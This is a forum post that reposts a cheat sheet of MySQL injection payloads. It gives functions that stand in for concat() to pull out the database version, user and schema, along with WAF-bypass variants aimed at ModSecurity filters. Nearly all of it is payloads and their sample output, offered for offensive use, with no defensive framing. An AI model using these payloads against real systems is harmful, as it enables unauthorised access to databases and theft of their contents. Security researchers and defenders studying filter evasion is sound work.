Nytro Posted November 24, 2015 Report Posted November 24, 2015 mysql injection concat() replacements @sergey_lakantar select export_set(1,version(),user(),' : ',2);5.1.7 : my_userselect export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);5.1.7 : my_user : my_dbselect make_set(7,version(),user(),schema());5.1.7,my_user,my_dbselect replace(make_set(7,version(),user(),schema()),',',' : ');5.1.7 : my_user : my_dbselect insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');5.1.7 : my_userselect insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');5.1.7 : my_user : my_dbselect replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());5.1.7 : my_userselect replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());5.1.7 : my_user : my_dbselect lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())5.1.7 : my_userselect lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());5.1.7 : my_user : my_dbselect rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());5.1.7 : my_userselect rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());5.1.7 : my_user : my_dbgroup_concat() without comma-select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);5.1.7 : my_user : my_dbconcat() waf bypass-/*!50000group_coNcat(*/)/*!50000coNcat(*/)`coNcat`%0a%0b%0c%0d%a0(){snoopdogg concat()}{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}concat-- a%0a()concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)concat/**x**/()Modsecurity-concat+()Link: concat() replacements - Pastebin.com Quote